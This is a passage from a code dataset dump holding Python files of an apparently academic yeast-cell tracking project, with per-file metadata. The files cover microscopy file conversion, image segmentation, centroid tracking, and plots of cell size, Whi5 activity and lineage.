seriesFlag + cropFlag + zoomFlag + filePath + tifPath\n\n os.system(cmd)\n"
},
{
"alpha_fraction": 0.6400946974754333,
"alphanum_fraction": 0.6590371131896973,
"avg_line_length": 29.530120849609375,
"blob_id": "87f2ab0fdef2171552237892aecfc4550caa0849",
"content_id": "ef8b77bbd5139f56c0b724d12254519e5ccad0bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2534,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 83,
"path": "/UserInterface/LoadData/LoadData.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\nfrom UserInterface.videoClass import Video\n#from Tkinter import Tk \n#from tkinter.filedialog import askopenfilename\n\n#Displays the OME-XML metadata for a file on the console:\n#showinf -omexml /path/to/file\n#showinf -nopix /path/to/file\n#os.popen('cat /etc/services').read()\n\ndef getVideo():\n filePath = getFilePath()\n\n series = choseSeries()\n\n cropUppLeft, cropDownRight = cropStage(filePath)\n\n #IF .lif file run\n convertLifToTif(lifFilePath, tifFilePath)\n video = imortTiftoVideo(tifFilePath)\n\n return(video)\n\ndef getFilePath():\n #Tk().withdraw()\n #filename = askopenfilename() # show an \"Open\" dialog box and return the path to the selected file\n #print(filename)\n path = \"/home/klas/Documents/Chalmers/ExamensArbete/YeastTrack/VideoData/Experiment13h_050619/Experiment13h_050619.lif\"\n return(path)\n\n#Gets Witch series should be loded by user\ndef choseSeries():\n print(\"What series would you like to load\")\n return(3)\n\n#Gets user to crop Video\ndef cropStage(filePath):\n uppLeft = (100,100)\n downRight = (200,200)\n return(uppLeft,downRight)\n\ndef loadData(filePath,series,cropUppLeft = -1, cropDownRight = -1):\n matList = []\n numZoomIn = 4\n numChan = 2\n #loading channel 0\n for channel in range(numChan):\n #List containg all zoom in levels\n zoomList = []\n for zoomLevel in range(numZoomIn):\n cleanWorking = \"rm ./YeastTrack/VideoData/WorkingData/*\"\n os.system(cleanWorking)\n\n comand = \"./bftools/bfconvert -nolookup\"\n seriesFlag = \" -series \" + str(series)\n channelFlag = \" -channel \" + str(channel)\n zoomFlag = \" -z \" + str(zoomLevel)\n cropFlag = \" -crop 0,0,512,512\"\n filePath = \" \" + filePath\n tifPath = \" ./YeastTrack/VideoData/WorkingData/working.tif\"\n\n cmd = comand + seriesFlag + cropFlag + channelFlag + zoomFlag + filePath + tifPath\n os.system(cmd)\n path = \"./YeastTrack/VideoData/WorkingData/working.tif\"\n retval, mats = cv2.imreadmulti(path)\n zoomList.append(mats)\n matList.append(zoomList)\n\n return(matList)\n\n\ndef skrap():\n path = \"/home/klas/Documents/Chalmers/ExamensArbete/YeastTrack/VideoData/WorkingData/working.tif\"\n\n retval, mats = cv2.imreadmulti(path)\n #retval, mats = cv2.imread(path)\n\n for i in range(len(mats)):\n cv2.imshow(\"Funka\",mats[i])\n cv2.waitKey()\n"
},
{
"alpha_fraction": 0.6512660980224609,
"alphanum_fraction": 0.6548200845718384,
"avg_line_length": 30.26388931274414,
"blob_id": "f7bda7d2de23041d7ce48d8b862ed88303ebda0f",
"content_id": "1a0b395f337ace48811458a8d1b289a31f65ff2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2251,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 72,
"path": "/Analysis/VisulizeLinage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from matplotlib import pyplot as plt\nfrom scipy.cluster import hierarchy\nimport numpy as np\nimport networkx as nx\nfrom networkx.drawing.nx_agraph import graphviz_layout\nimport matplotlib.pyplot as plt\nfrom Anlysis.visulizeLinNetworkX import plotNxTree\n#import PyQt5\n#from ete3 import Tree\n#'from ete3 import TreeStyle\n# from igraph import *;\nfrom networkx.drawing.nx_agraph import graphviz_layout\n\n\n#def PlotLinageTree(trackedCells):\n#\n\n#Plots Linage tree\ndef PlotLinageTree(trackedCells):\n G = nx.DiGraph()\n #Add all Cells As Nodes\n for trCell in trackedCells:\n cellLabel = str(trCell.getCellID())#\"ID \" +\n G.add_node(cellLabel)\n\n #Add all edges\n for trCell in trackedCells:\n motherID = trCell.getMotherCell()\n if motherID == None:\n motherID = -1\n cellLabelM = str(motherID)#\"ID \" +\n cellLabelD = str(trCell.getCellID())#\"ID \" +\n relFactor = trCell.getRelatabelityFactor()\n G.add_edge(cellLabelM, cellLabelD, object=str(round(relFactor, 2)))\n\n btree = G#nx.balanced_tree(2,4)\n pos=graphviz_layout(G,prog='dot')\n nx.draw(G,pos,with_labels=True,arrows=True)\n #plotNxTree(G)\n #nx.draw_networkx(G, pos = nx.spring_layout(G))\n #nx.draw_networkx_edge_labels(G, pos = nx.spectral_layout(G))\n #plt.sxhow()\n #pos = nx.nx_pydot.graphviz_layout(g, prog='neato')\n #nx.draw(g, pos=layout)\n edge_labels = nx.get_edge_attributes(G, 'object')\n nx.draw_networkx_edge_labels(G, pos=pos, edge_labels=edge_labels)\n plt.show()\n\n\ndef PlotLinageTreeOLD(trackedCells):\n G = nx.DiGraph()\n\n G.add_node(\"ROOT\")\n\n for i in range(5):\n G.add_node(\"Child_%i\" % i)\n G.add_node(\"Grandchild_%i\" % i)\n G.add_node(\"Greatgrandchild_%i\" % i)\n\n G.add_edge(\"ROOT\", \"Child_%i\" % i)\n G.add_edge(\"Child_%i\" % i, \"Grandchild_%i\" % i)\n G.add_edge(\"Grandchild_%i\" % i, \"Greatgrandchild_%i\" % i)\n\n # write dot file to use with graphviz\n # run \"dot -Tpng test.dot >test.png\"\n nx.nx_agraph.write_dot(G,'test.dot')\n\n # same layout using matplotlib with no labels\n plt.title('draw_networkx')\n pos=graphviz_layout(G, prog='dot')\n nx.draw(G, pos, with_labels=False, arrows=False)\n plt.savefig('nx_test.png')\n"
},
{
"alpha_fraction": 0.7648902535438538,
"alphanum_fraction": 0.7680251002311707,
"avg_line_length": 44.57143020629883,
"blob_id": "96186f399f4eb8fb83082c4a98e8e7746a93b040",
"content_id": "f751da124198fcc2e5bdce4d6cbcbdc459dd9ef0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 7,
"path": "/Analysis/PlotTrackedCellsSize.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from matplotlib import pyplot as plt\nfrom Anlysis.getDevisionFrameNum import getDevisionFrameNum\ndef plotTrackedCellsSize(trackedCells):\n for trCell in trackedCells:\n deviNum = getDevisionFrameNum(trCell)\n trace = trCell.getSizesTraceFromBegining()[0:deviNum]\n plt.plot(range(len(trace)),trace)\n"
},
{
"alpha_fraction": 0.6755824089050293,
"alphanum_fraction": 0.6833477020263672,
"avg_line_length": 32.59420394897461,
"blob_id": "bcf2735d0ef8272ba41dfb3d957dab4c13e96a79",
"content_id": "5cc7fd98e8b38206a9d23ad88c34816881f195fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2318,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 69,
"path": "/Analysis/plotFunctions.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from matplotlib import pyplot as plt\nfrom Anlysis.plotSize import plotTrackCellSizeBudToMother\nfrom Anlysis.VisulizeLinage import PlotLinageTree\n\ndef plotFunction(trackedCells):\n cellToPlot = range(len(trackedCells))\n #plotTrackCellSizeBudToMother(cellToPlot, trackedCells)\n #PlotLinageTree(trackedCells)\n plotTrackCellWhi5(cellToPlot, trackedCells)\n\n#Pre1: ID number for cell\n#Pre2: List of tracked cells.\ndef plotSizeLineage(cellID,trackedCells):\n cellsInLinage = [cellID]\n for trackCell in trackedCells:\n if(trackCell.getMotherCell() == cellID):\n cellsInLinage.append(trackCell.getCellID())\n cellsInLinage = [0,6,13]\n plotTrackCellSize(cellsInLinage, trackedCells)\n plotTrackCellWhi5(cellsInLinage, trackedCells)\n\n\ndef plotTrackCellSize(cellToPlot, trackedCells):\n for trackedCell in trackedCells:\n cellID = trackedCell.getCellID()\n if any(cellID == i for i in cellToPlot):\n whi5Trace = trackedCell.getSizesTrace()\n dicovFrame = trackedCell.getDetectionFrameNum()\n plt.plot(range(dicovFrame, dicovFrame+len(whi5Trace)),whi5Trace, label=\"ID \" + str(cellID))\n\n plt.ylabel('Growth Curves')\n plt.xlabel('Time')\n plt.title(\"Size\")\n plt.xticks([])\n plt.yticks([])\n plt.legend()\n plt.show()\n\ndef plotTrackCellWhi5(cellToPlot, trackedCells):\n for trackedCell in trackedCells:\n cellID = trackedCell.getCellID()\n if any(cellID == i for i in cellToPlot):\n whi5Trace = trackedCell.getWhi5Trace()\n dicovFrame = trackedCell.getDetectionFrameNum()\n plt.plot(range(dicovFrame, dicovFrame+len(whi5Trace)),whi5Trace, label=\"ID \" + str(cellID))\n\n plt.ylabel('Whi5 Activity')\n plt.xlabel('Time')\n plt.title(\"Whi5 Activity\")\n plt.xticks([])\n plt.yticks([])\n plt.legend()\n plt.show()\n\n\ndef plotPositions(cellToPlot, trackedCells):\n for trackedCell in trackedCells:\n cellID = trackedCell.getCellID()\n if any(cellID == i for i in cellToPlot):\n xPosTrace,yPosTrace = trackedCell.getPosTrace()\n plt.plot(xPosTrace,yPosTrace)#, label=\"ID \" + str(cellID))\n\n plt.ylabel('y Position')\n plt.xlabel('x Position')\n plt.title(\"Position Trace\")\n plt.xticks([])\n plt.yticks([])\n plt.legend()\n plt.show()\n"
},
{
"alpha_fraction": 0.6150793433189392,
"alphanum_fraction": 0.6547619104385376,
"avg_line_length": 27,
"blob_id": "419dda9a46b0ff8778c264642dd736c6b7c040c1",
"content_id": "4d70c2e87a9117a50d14da81f90601bbc541bc2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 9,
"path": "/Tracking/GetPositionFromContour.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\n\ndef getPositionFromContour(contour):\n moments = cv2.moments(contour)\n #TOOD Byt till funktioner ist??\n cx = int(moments['m10']/moments['m00'])\n cy = int(moments['m01']/moments['m00'])\n position = (cx,cy)\n return(position)\n"
},
{
"alpha_fraction": 0.6580954790115356,
"alphanum_fraction": 0.6744843125343323,
"avg_line_length": 28.491666793823242,
"blob_id": "2dea47dc44e4dd6d132c6b4cdfc0e83061f5c526",
"content_id": "6c428ceaf3303eee89837722899a4e0031dcc877",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3539,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 120,
"path": "/UserInterface/frameClass.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from Segmentation.cellInstance import cellInstance\nimport cv2\nimport numpy as np\nfrom Tracking.centroidTracker import CentroidTracker\nfrom Segmentation.OstuBinarizartion import OtsuBinarization\nfrom Segmentation.watershed import watershed\nfrom Segmentation.cellInstance import cellInstance\nfrom Segmentation.LaplacianGausian import laplacianGausian\nfrom Segmentation.ThersholdingSegmentation import segementThreshold\nfrom Segmentation.RandomForestSegmentaion import rfSegmentetion\nfrom UserInterface.getInstantSegmentImage import getCellInstImage\nfrom UserInterface.rescaleImageToUser import rescaleImageToUser\n\nclass Frame:\n #TODO three zoom Init???\n\n #variables\n #optImage\n #floImage\n #Constructor\n def __init__(self,optImage,floImage,frameNum=-1):\n #TODO load as gray images\n #variables\n self.optImg = optImage\n self.floImg = floImage\n self.frameNum = frameNum\n\n self.xSz = self.optImg.shape[0]\n self.ySz = self.optImg.shape[1]\n\n self.scaling = 1000\n #TODO MAke to factors of scaling\n\n #TODO\n self.pixelToMiccron = 1000\n\n self.classFrame = 0\n self.idFrame = 0\n self.analyseFrame()\n\n\n def addZoomLevels(self,zom0Img,zom1Img):\n self.optImgZom0 = zom0Img\n self.optImgZom1 = zom1Img\n\n #Methods\n #Getters\n def getOptImage(self):\n return(self.optImg)\n\n def getFloImage(self):\n return(self.floImg)\n\n def getZoom0Image(self):\n return(self.optImgZom0)\n\n def getZoom1Image(self):\n return(self.optImgZom1)\n\n def getFrameNum(self):\n return(self.frameNum)\n\n def getUserOptImage(self):\n #Make A Certain Size\n img = self.getOptImage()\n #make Empty image with size\n userImg = np.zeros(img.shape, np.uint8)\n #Merge two zeros and one grey\n userImg = cv2.merge([img,img,img])\n userImg = rescaleImageToUser(userImg)\n return(userImg)\n\n def getUserFloImage(self):\n #Make A Certain Size\n img = self.getFloImage()\n #make Empty image with size\n userImg = np.zeros(img.shape, np.uint8)\n #Merge two zeros and one grey\n userImg = cv2.merge([userImg,img,userImg])\n userImg = rescaleImageToUser(userImg)\n return(userImg)\n\n def getClassificationImage(self):\n return(self.classImg)\n\n #Ret: Image ilustrating whi5 Activation\n def getWHI5ActivImage(self):\n #Whi5Detect\n threshold = 0.30\n #CellDeteect\n #threshold = 0.175-0.0125\n #gray = cv2.cvtColor(self.getScaledfloImage(),cv2.COLOR_BGR2GRAY)\n gray = self.getUserFloImage()\n #apply thresholding\n gotFrame, thresh = cv2.threshold(gray,int(255*threshold),255,cv2.THRESH_BINARY)\n return(thresh)\n\n #ret: Gives Image\n def getCellInstancesImage(self):\n #self.cellInstanses\n return(getCellInstImg(self.cellInstanses))\n\n #ret: Image With ID at cell positions\n def getIDImage(self):\n return(self.idImg)\n\n #Setters\n def showFrame(self):\n cv2.imshow(\"optImage\",self.optImage)\n cv2.imshow(\"floImage\",self.floImage)\n cv2.waitKey(0)\n\n #Segmentation of frame.\n #Use the Anlysis Method selected\n def analyseFrame(self):\n self.cellInstanses = OtsuBinarization(self)\n #self.cellInstanses = segementThreshold(self)\n #self.cellInstanses = rfSegmentetion(self)\n #self.cellInstanses = watershed(self)\n #self.cellInstanses = laplacianGausian(self)\n"
},
{
"alpha_fraction": 0.6295205950737,
"alphanum_fraction": 0.6724137663841248,
"avg_line_length": 33.463768005371094,
"blob_id": "b2c277c8d1303bc142a19863930f7b4b4ab8ef6a",
"content_id": "6cc7296638395616dc8bc12713fd893427226317",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2378,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 69,
"path": "/Segmentation/getThreshold.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nfrom Segmentation.FilterDetection import filterDetections\nimport numpy as np\n\n#Threshold Image that\n#Pre: Frame objecet\n#Ret: Threshold Image\ndef getTherholdImage(frame):\n optFrame = frame.getScaledOptChan()\n floFrame = frame.getScaledFloChan()\n\n gaussian = cv2.GaussianBlur(optFrame, (3, 3), 0)\n\n gray = cv2.cvtColor(gaussian,cv2.COLOR_BGR2GRAY)\n gotFrame, thresh = cv2.threshold(gray,50,255,cv2.THRESH_BINARY)\n #Remove background\n thresh = removeLargestConected(thresh)\n #cv2.imshow(\"Thresh\",thresh)\n #cv2.waitKey(0)\n return(thresh)\n\n\ndef removeLargestConected(image):\n conectedCompontents, hirearchy = cv2.findContours(image, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n\n drawing = np.zeros((image.shape[0], image.shape[1], 3), np.uint8)\n cellSize = 4500\n sizeThreshold = cellSize*10\n\n for cnt in conectedCompontents:\n #check Size\n\n if(sizeThreshold > cv2.contourArea(cnt)):\n #drawing = cv2.fillPoly(drawing, pts =cnt[0], color=(255,255,255))\n #drawing = cv2.drawContours(drawing, [cnt], 0, (0,255,0), 3)\n drawing = cv2.fillPoly(drawing, pts =[cnt], color=(255,255,255))\n return(drawing)\n\n\ndef convexHull(frame):\n # Finding contours for the thresholded image\n\n contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n #im2, contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # create hull array for convex hull points\n hull = []\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull.append(cv2.convexHull(contours[i], False))\n\n #Create an empty black image\n drawing = np.zeros((frame.shape[0], frame.shape[1], 3), np.uint8)\n\n #Draw contours\n for i in range(len(contours)):\n color_contours = (0, 255, 0) # green - color for contours\n color = (255, 0, 0) # blue - color for convex hull\n #Draw ith contour\n cv2.drawContours(drawing, contours, i, color_contours, 1, 8, hierarchy)\n # draw ith convex hull object\n cv2.drawContours(drawing, hull, i, color, 1, 8)\n\n for i in range(len(contours)):\n drawing = cv2.fillPoly(drawing, pts =[hull[i]], color=(255,255,255))\n\n return(drawing)\n #cv2.imshow(\"ConvexHull\",drawing)\n #cv2.waitKey(0)\n"
},
{
"alpha_fraction": 0.6728624701499939,
"alphanum_fraction": 0.6914498209953308,
"avg_line_length": 32.625,
"blob_id": "bbdd7bd4cc9b2a9c528def269e568e6be3a08b90",
"content_id": "6b59040e63cbae7ee7c9ed31592d74b229204cdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 8,
"path": "/Segmentation/Rescaling.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\n#Rescale for optimal analysis size\n#What is this size??\ndef rescaleImage(img,portion):\n width = int(img.shape[1] * portion)\n height = int(img.shape[0] * portion)\n dim = (width, height)\n return cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n"
},
{
"alpha_fraction": 0.7091108560562134,
"alphanum_fraction": 0.7178924083709717,
"avg_line_length": 29.366666793823242,
"blob_id": "a03e3522537a0cef4644127133241ed08eeeb240",
"content_id": "ad90d3f33affec380f9eb5895665e1e558e1ba0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 911,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 30,
"path": "/Tracking/filterTracking.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "#Pre: List of trackedCells\n#Ret: Filterd list with trackedCells\ndef filterTrackedCells(trackedCells):\n\n trackedCells = filterByOpserLen(trackedCells)\n trackedCells = filterByMeanSize(trackedCells)\n return(trackedCells)\n\n\ndef filterByOpserLen(trackedCells):\n filterdList = []\n #Filter by observation length\n observationThreshold = 10\n for tracked in trackedCells:\n exsistingLength = len(tracked.getSizesTrace())\n if exsistingLength > observationThreshold:\n filterdList.append(tracked)\n return(filterdList)\n\ndef filterByMeanSize(trackedCells):\n filterdList = []\n #Filter by mean size\n cellSize = 4500\n cellThreshold = 0.2*cellSize\n for tracked in trackedCells:\n meanSizeCell = sum(tracked.getSizesTrace())/len(tracked.getSizesTrace())\n if meanSizeCell > cellThreshold:\n filterdList.append(tracked)\n\n return(filterdList)\n"
},
{
"alpha_fraction": 0.6028012633323669,
"alphanum_fraction": 0.6538054943084717,
"avg_line_length": 32.78571319580078,
"blob_id": "0f503c2d9c60163ba27bf7829abb695e322da4b1",
"content_id": "85f188fb90c90cee6ee011240c93ed721cbd08e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3784,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 112,
"path": "/Segmentation/ParmeterizeImagegs.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\nimport pandas as pd\nfrom scipy import ndimage as nd\nimport gc\n\n\ndef imagesToPrameter(optImgArr,floImgArr,maskImgArr = []):\n #Save Originals to DataFrame\n #img2 = img.reshape(-1)\n #print(\"loading Images\")\n optImgReArr = []\n floImgReArr = []\n for imgIndex in range(len(optImgArr)):\n optImgReArr.append(optImgArr[imgIndex].reshape(-1))\n floImgReArr.append(floImgArr[imgIndex].reshape(-1))\n\n df = pd.DataFrame()\n #df['optImg'] = np.append(optImgReArr)\n df['optImg'] = np.concatenate(optImgReArr, axis=0)\n df['floImg'] = np.concatenate(floImgReArr, axis=0)\n del optImgReArr\n del floImgReArr\n gc.collect()\n\n #Add Filters To Model\n #print(\"loading Median Filter\")\n #MEDIAN with sigma=3\n medC0Z3Arr = []\n medC1Z2Arr = []\n for imgIndex in range(len(optImgArr)):\n medC0Z3 = nd.median_filter(optImgArr[imgIndex], size=3)\n medC1Z2 = nd.median_filter(floImgArr[imgIndex], size=3)\n medC0Z3Arr.append(medC0Z3.reshape(-1))\n medC1Z2Arr.append(medC1Z2.reshape(-1))\n df['MedS3C0Z3'] = np.concatenate(medC0Z3Arr, axis=0)\n df['MedS3C1Z2'] = np.concatenate(medC1Z2Arr, axis=0)\n del medC0Z3Arr\n del medC1Z2Arr\n gc.collect()\n\n medC0Z3Arr = []\n medC1Z2Arr = []\n for imgIndex in range(len(optImgArr)):\n medC0Z3 = nd.median_filter(optImgArr[imgIndex], size=1)\n medC1Z2 = nd.median_filter(floImgArr[imgIndex], size=1)\n medC0Z3Arr.append(medC0Z3.reshape(-1))\n medC1Z2Arr.append(medC1Z2.reshape(-1))\n df['MedS1C0Z3'] = np.concatenate(medC0Z3Arr, axis=0)\n df['MedS1C1Z2'] = np.concatenate(medC1Z2Arr, axis=0)\n del medC0Z3Arr\n del medC1Z2Arr\n gc.collect()\n\n #print(\"loading Variance\")\n #VARIANCE with size=3\n varC0Z3Arr = []\n varC1Z2Arr = []\n for imgIndex in range(len(optImgArr)):\n varC0Z3 = nd.generic_filter(optImgArr[imgIndex], np.var, size=3)\n varC1Z2 = nd.generic_filter(floImgArr[imgIndex], np.var, size=3)\n varC0Z3Arr.append(varC0Z3.reshape(-1))\n varC1Z2Arr.append(varC1Z2.reshape(-1))\n df['varS3C0Z3'] = np.concatenate(varC0Z3Arr, axis=0)\n df['varS3C1Z2'] = np.concatenate(varC1Z2Arr, axis=0)\n del varC0Z3Arr\n del varC1Z2Arr\n gc.collect()\n\n #VARIANCE with size=3\n varC0Z3Arr = []\n varC1Z2Arr = []\n for imgIndex in range(len(optImgArr)):\n varC0Z3 = nd.generic_filter(optImgArr[imgIndex], np.var, size=1)\n varC1Z2 = nd.generic_filter(floImgArr[imgIndex], np.var, size=1)\n varC0Z3Arr.append(varC0Z3.reshape(-1))\n varC1Z2Arr.append(varC1Z2.reshape(-1))\n df['varS1C0Z3'] = np.concatenate(varC0Z3Arr, axis=0)\n df['varS1C1Z2'] = np.concatenate(varC1Z2Arr, axis=0)\n del varC0Z3Arr\n del varC1Z2Arr\n gc.collect()\n\n #VARIANCE with size=3\n histEC0Z3Arr = []\n histEC1Z2Arr = []\n for imgIndex in range(len(optImgArr)):\n histEC0Z3 = cv2.equalizeHist(optImgArr[imgIndex])\n histEC1Z2 = cv2.equalizeHist(floImgArr[imgIndex])\n histEC0Z3Arr.append(histEC0Z3.reshape(-1))\n histEC1Z2Arr.append(histEC1Z2.reshape(-1))\n df['histES1C0Z3'] = np.concatenate(histEC0Z3Arr, axis=0)\n df['histES1C1Z2'] = np.concatenate(histEC1Z2Arr, axis=0)\n del histEC0Z3Arr\n del histEC1Z2Arr\n gc.collect()\n\n\n if maskImgArr != []:\n print(\"loading Labels\")\n maskImgArrRe = []\n for maskImgIndex in range(len(maskImgArr)):\n maskImg = maskImgArr[maskImgIndex].reshape(-1)\n maskImgArrRe.append(maskImg)\n #print(maskIm)\n df['Labels'] = np.concatenate(maskImgArrRe, axis=0)\n del maskImgArrRe\n gc.collect()\n #print(\"writing to File\")\n #df.to_csv('YeastCell/Train/modelTrain.csv', index=False)\n\n return(df)\n"
},
{
"alpha_fraction": 0.7424242496490479,
"alphanum_fraction": 0.7424242496490479,
"avg_line_length": 15.5,
"blob_id": "9acb316d9a011cd4872c5c00f173acfa094fae32",
"content_id": "50b55e5cf21d4bcbfc72ef6f4fd10ac0b4b7171b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 66,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 4,
"path": "/Segmentation/Denoising.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "#TODO\n#Write Method for denoising\ndef denoiseImage(img):\n pass\n"
},
{
"alpha_fraction": 0.6180633306503296,
"alphanum_fraction": 0.6342394948005676,
"avg_line_length": 35.785125732421875,
"blob_id": "c6c27cd0545adb4fe34af8268e4ab0819f729469",
"content_id": "a9b1d9b4d071c12bd2cac1280c853d88338cb579",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4451,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 121,
"path": "/UserInterface/videoClass.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from UserInterface.frameClass import Frame\n#from Segmentation.cellInstance import cellInstance\nimport cv2\nimport numpy as np\nfrom Tracking.centroidTracker import CentroidTracker\nfrom UserInterface.getIDImage import getIDImage\nfrom UserInterface.getClassImage import getClassImage\nfrom Tracking.findLineage import findLineage\nfrom Tracking.filterTracking import filterTrackedCells\n\nclass Video:\n #variables\n frames = []\n tracker = 0\n numFloFrames = 0\n maxDisappeared = 50\n #Constructor\n def vidCapInit(self,optImgCap,floImgCap):\n\n self.numZoom = 1\n self.numVidFrames = int(optImgCap.get(cv2.CAP_PROP_FRAME_COUNT))\n self.numFloFrames = int(optImgCap.get(cv2.CAP_PROP_FRAME_COUNT))\n self.tracker = CentroidTracker()\n\n for i in range(self.numVidFrames):\n print(\"loading Frame \" + str(i))\n #Read Images\n hasFrame,optImg = optImgCap.read()\n hasFrame,floImg = floImgCap.read()\n #Convert Images\n optImg = cv2.cvtColor(optImg, cv2.COLOR_BGR2GRAY)\n floImg = cv2.cvtColor(floImg, cv2.COLOR_BGR2GRAY)\n\n frame = Frame(optImg,floImg,i)\n self.frames.append(frame)\n\n #Init Object With List of mats with frames\n def matListInit(self, mats):\n self.numFrames = len(mats)\n print(\"Loadling \"+str(self.numFrames)+\" Frames\")\n self.tracker = CentroidTracker()\n for frameNum in range(self.numFrames):\n print(\"Loading Frame Number: \" + str(frameNum))\n #frameArr = mats[frameNum]\n #Channels\n optImg = mats[frameNum][0]\n #floImage = floArr[1]\n floImg = mats[frameNum][1]\n frame = Frame(optImg,floImg,frameNum)\n self.frames.append(frame)\n del mats\n\n def threeZoomInit(self, zom0Cap,zom1Cap,zom2Cap,flo1Cap):\n self.numZoom = 3\n self.numVidFrames = int(zom2Cap.get(cv2.CAP_PROP_FRAME_COUNT))\n self.numFloFrames = int(flo1Cap.get(cv2.CAP_PROP_FRAME_COUNT))\n self.tracker = CentroidTracker()\n for i in range(self.numVidFrames):\n print(\"loading Frame \" + str(i))\n #Read Images\n hasFrame,optImg = zom2Cap.read()\n hasFrame,floImg = flo1Cap.read()\n #Convert Images\n optImg = cv2.cvtColor(optImg, cv2.COLOR_BGR2GRAY)\n floImg = cv2.cvtColor(floImg, cv2.COLOR_BGR2GRAY)\n\n frame = Frame(optImg,floImg,i)\n\n #Extra Zoom Levels :))))\n #Read Images\n hasFrame,zom0Img = zom0Cap.read()\n hasFrame,zom1Img = zom1Cap.read()\n #Convert Images\n zom0Img = cv2.cvtColor(zom0Img, cv2.COLOR_BGR2GRAY)\n zom1Img = cv2.cvtColor(zom1Img, cv2.COLOR_BGR2GRAY)\n frame.addZoomLevels(zom0Img,zom1Img)\n self.frames.append(frame)\n\n #TODO take String that tells what init to use\n #Pre: captureVideo, captureFlo\n #Ret: Video object\n def __init__(self,arg1,arg2 = -1,arg3 = -1,arg4 = -1):\n if(arg2 == -1):\n self.matListInit(arg1)\n elif(arg3 != -1):\n self.threeZoomInit(arg1,arg2,arg3,arg4)\n else:\n self.vidCapInit(arg1,arg2)\n self.xSz = self.frames[0].getUserOptImage().shape[0]\n self.ySz = self.frames[0].getUserOptImage().shape[1]\n\n #Methods\n def getNumFrmes(self):\n return(len(self.frames))\n\n #Pre: frameNum nuber of the frame being retrived\n #Ret: Frame of given number\n def getFrame(self,frameNum):\n return(self.frames[frameNum])\n\n def getTrackedCells(self):\n return(self.trackedCells)\n\n def runTracking(self):\n #loop through frames in video\n for frame in self.frames:\n cellInstanses = frame.cellInstanses\n self.trackedCells = self.tracker.updateCellInst(cellInstanses)\n frame.idImg = getIDImage(self.trackedCells,frame)\n frame.classImg = getClassImage(self.trackedCells,frame.xSz,frame.ySz)\n\n #self.trackedCells = filterTrackedCells(self.trackedCells)\n #TODO: Make ID frame and 
Segmentation Frame Here after filtering\n #for frame in self.frames:\n #frame.idFrame = getIDFrameNY(self.trackedCells,frame)\n #frame.classFrame = getClassFrameNY(self.trackedCells,frame.xScaleSz,frame.yScaleSz)\n\n self.findLineage()\n\n def findLineage(self):\n findLineage(self.trackedCells)\n"
}
] | 48 |
parmaviolet/fossick | https://github.com/parmaviolet/fossick | 48001f286e328acb0ecdbfaf5dd502ce9bc77bf9 | 6f2ec00d02d4a3e8f8342373c1cd349c5e596570 | 801df575cf3e3695c99c294c832591995b7629a4 | refs/heads/main | 2023-01-19T07:48:08.091854 | 2020-12-04T01:18:31 | 2020-12-04T01:18:31 | 308,563,028 | 0 | 0 | null | 2020-10-30T08:01:42 | 2020-11-01T10:32:22 | 2020-11-01T23:45:41 | Python | [
{
"alpha_fraction": 0.6165900826454163,
"alphanum_fraction": 0.6204783916473389,
"avg_line_length": 30.786516189575195,
"blob_id": "af5e2eabf8f72be448b0ff56d4efb9a6e90e8bd8",
"content_id": "94ba6b598f43d6b199257aaa90179e33a0554009",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8487,
"license_type": "no_license",
